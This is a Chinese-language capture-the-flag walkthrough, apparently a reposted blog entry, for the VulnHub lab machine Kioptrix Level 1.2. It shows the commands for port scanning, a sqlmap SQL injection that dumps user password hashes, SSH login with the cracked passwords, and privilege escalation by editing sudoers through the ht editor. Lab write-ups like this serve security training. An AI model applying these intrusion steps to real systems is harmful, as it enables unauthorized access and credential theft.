vulnhub靶机:Kioptrix : Level 1.2

下载

下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

配置网卡

信息收集

主机发现

arp-scan -l

端口扫描

nmap -p- 192.168.109.176

目录扫描

python3 dirsearch.py -u "192.168.109.176"

访问 web

将域名与ip做绑定

如图所示

回到 Home

发现 id=1 ,可能存在 SQL注入

漏洞利用

SQL注入

python3 sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --batch --dump

发现了下面几组账号和密码

dreg
0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)

loneferret
5badcaf789d3d1d09794d8f021f40f0e (starwars)

admin
n0t7t1k4

尝试用 admin / n0t7t1k4 登录

登录之后,发现登录失败

尝试 ssh 连接

ssh [email protected]
Mast3r

sudo -l 后发现没有权限

切换loneferret用户

su loneferret
starwars

查看权限

sudo -l

权限提升

查看loneferret家目录的信息

ls -al

查找SUID可执行文件

find / -perm -u=s -type f 2>/dev/null

发现可以使用ht软件命令来编辑、创建和查看文件

用 ht 编辑器提权

sudo /usr/local/bin/ht
# 若报错Error opening terminal: xterm-256color,则执行下面这条命令
export TERM=xterm

F3		# 打开

手动添加 /bin/bash

F2		# 保存
F10		# 退出

提权成功

猜你喜欢

转载自blog.csdn.net/weixin_68416970/article/details/142302235
1.2